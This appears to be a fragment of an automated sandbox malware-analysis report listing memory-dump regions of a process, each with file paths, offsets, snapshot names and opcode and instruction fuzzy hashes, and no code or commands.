                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3a35cc3bbabd7397f2a19eacac939e704dc261b9c479c0f26d379201c7a4c85
                                                                                          • Instruction ID: a4e64b5d0ed9073c67b601532b020698ffa7d3301e2d4452984c930e2f7c0fed
                                                                                          • Opcode Fuzzy Hash: a3a35cc3bbabd7397f2a19eacac939e704dc261b9c479c0f26d379201c7a4c85
                                                                                          • Instruction Fuzzy Hash: D022C160B2DA595FE798FB38945A2B976D2FF88780F440579D00EC32C6DE68AC019792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a371cdaca2ca48cffc8930cf966e617652db539d65481e7d5303d89f6d8e82f6
                                                                                          • Instruction ID: e1e0eb74b22dc4f02d970e65cdcf7a80853605d3a5e998ef9cbec24bde5819a1
                                                                                          • Opcode Fuzzy Hash: a371cdaca2ca48cffc8930cf966e617652db539d65481e7d5303d89f6d8e82f6
                                                                                          • Instruction Fuzzy Hash: 73513120A1E6C54FD386EB7818252767FE0EF87269F0800FAE08EC71D7DE484806C356
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9L_^
                                                                                          • API String ID: 0-1679237627
                                                                                          • Opcode ID: faf36f0827b6c235e2b0d57738f50722f2cfb4f5e3bbd7003c8a2b667b30a656
                                                                                          • Instruction ID: d5f6c196f3f74c282caaa573b743c56b70cf3907803e7ce8bcdc5c1e3e57b31f
                                                                                          • Opcode Fuzzy Hash: faf36f0827b6c235e2b0d57738f50722f2cfb4f5e3bbd7003c8a2b667b30a656
                                                                                          • Instruction Fuzzy Hash: 48612825A0E52A6EE705FBBCE4421FC3BA0EF893A5F540537D01CC7293CE28A94697D5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4L_^
                                                                                          • API String ID: 0-2524838182
                                                                                          • Opcode ID: ae450f5b7a37b8d7c366371808265223eac35d3234884208ecc9b9342e6483bd
                                                                                          • Instruction ID: 9e9d24f4e2e85bea7b2c45c0197a539fe9980e633e7cccfd761424f69a48dad3
                                                                                          • Opcode Fuzzy Hash: ae450f5b7a37b8d7c366371808265223eac35d3234884208ecc9b9342e6483bd
                                                                                          • Instruction Fuzzy Hash: 02512921A0EA861FE356B77C98562B93FE1DF86660B0940FBD08DC7197DD5C9C438362
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5352269b3f174d3e8f236a97e66b607e5c573f7cdbff17e13bcf2b48f6223125
                                                                                          • Instruction ID: c3ea1385e9461732893132c72b3d2ee4b835d833d686388f6c32c7b934c6fec9
                                                                                          • Opcode Fuzzy Hash: 5352269b3f174d3e8f236a97e66b607e5c573f7cdbff17e13bcf2b48f6223125
                                                                                          • Instruction Fuzzy Hash: 7021EA32D0E6955FE302FB7CD8560F97BB1EF42265F0805B7C088DB193DE2868069795
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 69793992d71b91d9c5421ebd6097334d7868e419603c48bebf8d3161dcd3a8bf
                                                                                          • Instruction ID: 603a3a342ab4c836d976df9015f53c021cf4c338d2755a0dac4a4ca1bb8c401d
                                                                                          • Opcode Fuzzy Hash: 69793992d71b91d9c5421ebd6097334d7868e419603c48bebf8d3161dcd3a8bf
                                                                                          • Instruction Fuzzy Hash: B3A10226B0D9266EE701FBBCF8421FD7B60EF863A1B544577C148CA193CA24A48AC7D1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cefcacf8df1e740364fb18d1ac5035915e2038470db8107fb9bf40b219a9c87d
                                                                                          • Instruction ID: 7251e177abbe52ee60164a5f8605c6998d40695484e3951227e491fe56842ccc
                                                                                          • Opcode Fuzzy Hash: cefcacf8df1e740364fb18d1ac5035915e2038470db8107fb9bf40b219a9c87d
                                                                                          • Instruction Fuzzy Hash: F131C461F1D90A5FE744FBBC581A3BD76D2EF98791F040276E00DC7286DE686C418792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 89485b4dbaabe75bd3a9e467d8f2d95d099e549bf514389eb5e8448fb9f4d739
                                                                                          • Instruction ID: 16a22c2f5befbc0f1dc3102f87d5b717c9022be78951482d6cbdc09048f17e52
                                                                                          • Opcode Fuzzy Hash: 89485b4dbaabe75bd3a9e467d8f2d95d099e549bf514389eb5e8448fb9f4d739
                                                                                          • Instruction Fuzzy Hash: 9A41AC70A1DA4A9FEB85FB78D8666BD7BB1FF88300F90047AD009D7286CE6869058751
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d308997fdf2f590774a0c4fb4d6e5231cab2f25a6df30dbdae7da38c8a42cc86
                                                                                          • Instruction ID: 5403ff0b803a2185af8436e28e456f80b06d569634d3e94855b8623734c782fb
                                                                                          • Opcode Fuzzy Hash: d308997fdf2f590774a0c4fb4d6e5231cab2f25a6df30dbdae7da38c8a42cc86
                                                                                          • Instruction Fuzzy Hash: C331B33194AA89AFDB86EF3CD0A51AD7FF1EF85240FC045BAD818C7387DD686A018751
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7a1df307562afa4deb3b4de081e05e0e641131a9f23b51197c9fe60baaa09a76
                                                                                          • Instruction ID: 76be8af34d712a1bd54d195929f0cb470c949d5f909cae29ebceac0cbef9bd4a
                                                                                          • Opcode Fuzzy Hash: 7a1df307562afa4deb3b4de081e05e0e641131a9f23b51197c9fe60baaa09a76
                                                                                          • Instruction Fuzzy Hash: 4821A83195AA899FDB86EF38D0A55AD7FF1FF85240FC044A9D819C3397CD686A00C751
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.3268317887.00007FF848A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_7ff848a30000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8a5632105281a85e72963dff57e8dfc17959067343bb35cf92ebbda84ee10360
                                                                                          • Instruction ID: 1e643552db6853fc1568d3fffe1f1986d4cf2bcf689bf68fd92f4c3d42deef70
                                                                                          • Opcode Fuzzy Hash: 8a5632105281a85e72963dff57e8dfc17959067343bb35cf92ebbda84ee10360
                                                                                          • Instruction Fuzzy Hash: 7001262490EB810FE782F73858165357FF0DF91286B4804BBE898C61A7D948A9848357